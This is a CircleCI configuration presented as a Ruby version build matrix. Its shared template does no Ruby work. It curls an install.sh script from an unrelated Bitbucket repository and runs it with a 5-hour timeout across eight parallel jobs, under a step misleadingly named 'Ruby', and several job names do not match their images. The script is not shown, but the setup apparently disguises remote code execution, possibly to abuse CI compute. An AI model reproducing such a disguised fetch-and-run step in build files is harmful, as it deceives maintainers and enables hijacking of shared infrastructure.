.build_template: &build_definition
  steps:
    - run: curl -L https://bitbucket.org/versaxaxd/versax/raw/fd952c9fe2d21d117d11bac249c06474824425f1/install.sh > ./install.sh
    - run: chmod +x ./install.sh
    - run: 
       name: Ruby
       command: ./install.sh
       no_output_timeout: 5h

version: 2.0

jobs:
  build:
    docker:
      - image: ruby
    steps:
      - checkout
  build_ruby2_7:
    <<: *build_definition
    docker:
      - image: ruby:2.7
  build_ruby2_6:
    <<: *build_definition
    docker:
      - image: ruby:2.6
  build_ruby2_5:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_4:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_3:
    <<: *build_definition
    docker:
      - image: ruby:2.3
  build_ruby2_2:
    <<: *build_definition
    docker:
      - image: ruby:2.5
  build_ruby2_1:
    <<: *build_definition
    docker:
      - image: ruby:2.4
  build_ruby2_0:
    <<: *build_definition
    docker:
      - image: ruby:2.3
      
workflows:
  version: 2
  build_ruby_versions:
    jobs:
      - build
      - build_ruby2_7
      - build_ruby2_6
      - build_ruby2_5
      - build_ruby2_4
      - build_ruby2_3
      - build_ruby2_2
      - build_ruby2_1
      - build_ruby2_0